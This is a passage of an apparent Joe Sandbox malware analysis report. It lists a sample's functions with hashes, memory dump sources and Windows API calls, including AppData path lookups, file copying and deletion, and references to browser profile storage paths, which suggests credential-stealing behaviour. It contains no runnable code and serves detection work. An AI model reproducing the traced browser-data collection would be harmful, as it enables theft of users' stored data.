                            • Source File: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d7398d31679b9e4061406ef1defab6291e226a1997bb4bc2ff88fe232d6d0fb1
                            • Instruction ID: f0a0787be1f2b43414a3743b52de7b0a36f811fc682b9add16daf498adf973cc
                            • Opcode Fuzzy Hash: d7398d31679b9e4061406ef1defab6291e226a1997bb4bc2ff88fe232d6d0fb1
                            • Instruction Fuzzy Hash: CA51D1B26086009FE304AE2DDC8576AFBE6EFD8320F16493DD7C4C3780EA7958418796
                            Function 006E81CA Relevance: .2, Instructions: 175COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1fc59e9a8720580aca252ec54eb55ccf0ebd5176e56cfe289e165926893983e8
                            • Instruction ID: 1d78bdb5c91cf6ba51773d1b60047f8788987ad5ca579ce046ebf18eaf543c18
                            • Opcode Fuzzy Hash: 1fc59e9a8720580aca252ec54eb55ccf0ebd5176e56cfe289e165926893983e8
                            • Instruction Fuzzy Hash: D951F6F3E082109BE3046A6DDC8576AB7D5EB98320F1A463DEEC8D7344E57A5C1587C2
                            Function 00720BEB Relevance: .2, Instructions: 151COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ecdfe98b9305227f1eea489436f3999ef9a8a7492f54807412cf49ce4b1ec836
                            • Instruction ID: d5637e1bae844a8e4c96d1a208c8775804a09cb1a06454a7e21d2f128d31b88b
                            • Opcode Fuzzy Hash: ecdfe98b9305227f1eea489436f3999ef9a8a7492f54807412cf49ce4b1ec836
                            • Instruction Fuzzy Hash: ED415AF3A182004BF3086E29EC5577AB7E6EBD4720F2B423DD7D187B84E97855058687
                            Function 007D4D46 Relevance: .1, Instructions: 128COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d73583208387c4b7b3f77aa34a521cd3ca1f28f39958986cfeb4cc560f43797d
                            • Instruction ID: 854edc0a17d7749c79b0643d9a5b7bb4e818f6bd2055318baa49a65afcf637ef
                            • Opcode Fuzzy Hash: d73583208387c4b7b3f77aa34a521cd3ca1f28f39958986cfeb4cc560f43797d
                            • Instruction Fuzzy Hash: 053122F3F083141BF304A869ECC5776B6D9E794324F2B823EEA58D3B80E4799C054291
                            Function 006B5A84 Relevance: .1, Instructions: 126COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 67b31835f35ff71f96a21c861ef5718615ec0b0d21d5ce4a20bcdc14b0ac130c
                            • Instruction ID: 5f8aafa5365601669add6ae608279bf9620a4b1f6df1e0677e5e9859803009eb
                            • Opcode Fuzzy Hash: 67b31835f35ff71f96a21c861ef5718615ec0b0d21d5ce4a20bcdc14b0ac130c
                            • Instruction Fuzzy Hash: A931A9F3E192005BE3009939DC4576AB2D79BE0331F2F823DDE88937C4EC3859064686
                            Function 00840674 Relevance: .1, Instructions: 78COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9553a601dd137d25ac4bb968fd9742c349437dca6b8993723568d5a447d8ff19
                            • Instruction ID: 7029bcb9a270abc5a373208420cdd32106902527a799ee016f58ff652174961f
                            • Opcode Fuzzy Hash: 9553a601dd137d25ac4bb968fd9742c349437dca6b8993723568d5a447d8ff19
                            • Instruction Fuzzy Hash: 8A2122B251C204DFE706BF29C88266AFBF5FF98650F164D2DD6D482610E6319890CB87
                            Function 004485B0 Relevance: 69.4, APIs: 45, Strings: 1, Instructions: 449stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 00448636
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044866D
                            • lstrcpy.KERNEL32(?,00000000), ref: 004486AA
                            • StrStrA.SHLWAPI(?,00FFF190), ref: 004486CF
                            • lstrcpyn.KERNEL32(006693D0,?,00000000), ref: 004486EE
                            • lstrlen.KERNEL32(?), ref: 00448701
                            • wsprintfA.USER32 ref: 00448711
                            • lstrcpy.KERNEL32(?,?), ref: 00448727
                            • StrStrA.SHLWAPI(?,00FFF280), ref: 00448754
                            • lstrcpy.KERNEL32(?,006693D0), ref: 004487B4
                            • StrStrA.SHLWAPI(?,00FFF298), ref: 004487E1
                            • lstrcpyn.KERNEL32(006693D0,?,00000000), ref: 00448800
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                            • String ID: %s%s
                            • API String ID: 2672039231-3252725368
                            • Opcode ID: 17fead226b996ac1d6206d02e258da87631d68a4c34e9282c83382b93ef8ed21
                            • Instruction ID: 9ea8bd155e60d7207493250bbca3dd851377f0ef3c416745a26d0a01ab117fba
                            • Opcode Fuzzy Hash: 17fead226b996ac1d6206d02e258da87631d68a4c34e9282c83382b93ef8ed21
                            • Instruction Fuzzy Hash: 96F14C71900114EFDB10DB74DD48A9AB7BAEF88304F104659F909E7351DBB4AE05CBA5
                            Function 00431F79 Relevance: 54.4, APIs: 36, Instructions: 407stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00431F9F
                            • lstrlen.KERNEL32(00FF91A0), ref: 00431FAE
                            • lstrcpy.KERNEL32(00000000,?), ref: 00431FDB
                            • lstrcat.KERNEL32(00000000,?), ref: 00431FE3
                            • lstrlen.KERNEL32(00461794), ref: 00431FEE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043200E
                            • lstrcat.KERNEL32(00000000,00461794), ref: 0043201A
                            • lstrcpy.KERNEL32(00000000,?), ref: 00432042
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0043204D
                            • lstrlen.KERNEL32(00461794), ref: 00432058
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00432075
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00432081
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004320AC
                            • lstrlen.KERNEL32(?), ref: 004320E4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00432104
                            • lstrcat.KERNEL32(00000000,?), ref: 00432112
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00432139
                            • lstrlen.KERNEL32(00461794), ref: 0043214B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043216B
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00432177
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043219D
                            • lstrcat.KERNEL32(00000000,00000000), ref: 004321A8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004321D4
                            • lstrlen.KERNEL32(?), ref: 004321EA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043220A
                            • lstrcat.KERNEL32(00000000,?), ref: 00432218
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00432242
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0043227F
                            • lstrlen.KERNEL32(00FFDC48), ref: 0043228D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004322B1
                            • lstrcat.KERNEL32(00000000,00FFDC48), ref: 004322B9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004322F7
                            • lstrcat.KERNEL32(00000000), ref: 00432304
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043232D
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00432356
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00432382
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004323BF
                            • DeleteFileA.KERNEL32(00000000), ref: 004323F7
                            • FindNextFileA.KERNEL32(00000000,?), ref: 00432444
                            • FindClose.KERNEL32(00000000), ref: 00432453
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                            • String ID:
                            • API String ID: 2857443207-0
                            • Opcode ID: 110848ebc363536c8a2c8d5d59a7dee965df1f05fcb1e39ab200f4a818c475a5
                            • Instruction ID: d6122eb7ad62e8d0c0d4b0ef67f1746fd73c604eece3b6c556272b67c26bf8b3
                            • Opcode Fuzzy Hash: 110848ebc363536c8a2c8d5d59a7dee965df1f05fcb1e39ab200f4a818c475a5
                            • Instruction Fuzzy Hash: 9EE17271A103169FCB21EF75DE85A9F77B9AF08304F04612AF905A7211DBB8DD05CBA8
                            Function 00446410 Relevance: 52.9, APIs: 29, Strings: 1, Instructions: 438stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00446445
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00446480
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 004464AA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004464E1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00446506
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0044650E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00446537
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FolderPathlstrcat
                            • String ID: \..\
                            • API String ID: 2938889746-4220915743
                            • Opcode ID: 18ba190abcbc138dbb0b140453d32b5c6ac77640d8d78e7bd51ea96ea99d619d
                            • Instruction ID: edfbc126608c4df09dfce014914281ebefe65c4ff24dd27402431c6ff04c2446
                            • Opcode Fuzzy Hash: 18ba190abcbc138dbb0b140453d32b5c6ac77640d8d78e7bd51ea96ea99d619d
                            • Instruction Fuzzy Hash: 9BF1CE70A012059FEB21AF79D949AAF77B9AF05308F06502AF845D7351DB7CCC05CBAA
                            Function 00444370 Relevance: 49.3, APIs: 26, Strings: 2, Instructions: 334stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 004443A3
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 004443D6
                            • lstrcpy.KERNEL32(00000000,?), ref: 004443FE
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00444409
                            • lstrlen.KERNEL32(\storage\default\), ref: 00444414
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00444431
                            • lstrcat.KERNEL32(00000000,\storage\default\), ref: 0044443D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00444466
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00444471
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00444498
                            • lstrcpy.KERNEL32(00000000,?), ref: 004444D7
                            • lstrcat.KERNEL32(00000000,?), ref: 004444DF
                            • lstrlen.KERNEL32(00461794), ref: 004444EA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00444507
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00444513
                            • lstrlen.KERNEL32(.metadata-v2), ref: 0044451E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044453B
                            • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 00444547
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044456E
                            • lstrcpy.KERNEL32(00000000,?), ref: 004445A0
                            • GetFileAttributesA.KERNEL32(00000000), ref: 004445A7
                            • lstrcpy.KERNEL32(00000000,?), ref: 00444601
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044462A
                            • lstrcpy.KERNEL32(00000000,?), ref: 00444653
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044467B
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 004446AF
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
